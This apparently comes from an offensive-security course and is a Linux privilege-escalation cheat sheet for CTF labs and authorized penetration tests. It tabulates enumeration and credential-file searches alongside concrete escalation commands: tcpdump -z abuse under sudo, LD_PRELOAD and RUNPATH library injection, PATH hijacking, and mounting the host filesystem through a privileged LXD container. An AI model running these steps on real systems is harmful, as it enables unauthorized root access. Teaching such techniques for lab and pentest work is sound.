Linux Privilege Escalation Cheat Sheet
When working on Capture the Flag (CTF) labs or penetration tests (on LINUX), it is essential to gather information about the target system and look for privilege-escalation opportunities. The following commands provide a practical reference for enumeration, misconfiguration discovery, and common privilege-escalation techniques.
Linux Privilege Escalation Cheat Sheet
Initial Access and User Enumeration
| Command | Description |
|---|---|
ssh htb-student@<target IP> | SSH into the target machine using the htb-student account. |
ps aux \| grep root | List running processes and filter for those owned by root. |
ps au | Display currently logged-in users. |
ls /home | View all user home directories. |
ls -l ~/.ssh | Check for SSH keys belonging to the current user. |
history | Show the current user’s shell history. |
sudo -l | Check if the user can run commands as another user. |
Cron Jobs and File Systems
| Command | Description |
|---|---|
ls -la /etc/cron.daily | Inspect daily Cron jobs for potential privilege-escalation scripts. |
lsblk | List block devices to find unmounted file systems or hidden drives. |
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null | Find world-writable directories. |
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null | Find world-writable files. |
System and Kernel Information
| Command | Description |
|---|---|
uname -a | Display the kernel version (useful for kernel exploits). |
cat /etc/lsb-release | Show the operating system release details. |
Exploits and Binary Checks
| Command | Description |
|---|---|
gcc kernel_exploit.c -o kernel_exploit | Compile a C-based kernel exploit. |
screen -v | Check the installed version of GNU Screen (older versions may be vulnerable). |
./pspy64 -pf -i 1000 | Monitor running processes with pspy. |
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null | Locate binaries with the SUID bit set. |
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null | Locate binaries with the SETGID bit set. |
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root | Exploit tcpdump to escalate privileges. |
echo $PATH | Display the current user’s PATH variable. |
PATH=.:${PATH} | Add the current directory to the beginning of PATH. |
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null | Search for configuration files containing credentials. |
ldd /bin/ls | List shared objects required by a binary. |
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart | Escalate privileges using the LD_PRELOAD technique. |
readelf -d payroll \| grep PATH | Check the RUNPATH of a binary for potential library injection. |
gcc src.c -fPIC -shared -o /development/libshared.so | Compile a shared library for exploitation. |
LXD and Container Techniques
| Command | Description |
|---|---|
lxd init | Start the LXD initialization process. |
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine | Import a local Alpine Linux image into LXD. |
lxc init alpine r00t -c security.privileged=true | Launch a privileged LXD container. |
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true | Mount the host file system inside the container. |
lxc start r00t | Start the LXD container. |
Network and Remote Resources
| Command | Description |
|---|---|
showmount -e 10.129.2.12 | Display the NFS export list of a remote host. |
sudo mount -t nfs 10.129.2.12:/tmp /mnt | Mount an NFS share locally. |
tmux -S /shareds new -s debugsess | Create a shared tmux session socket. |
./lynis audit system | Perform a system audit with Lynis. |
Notes
- Many of these commands require elevated privileges or specific system conditions to be effective.
- Always verify permissions, ownerships, and kernel versions before attempting an exploit.
- Use these commands responsibly and only on systems you are authorized to test.
This post is licensed under CC BY 4.0 by the author.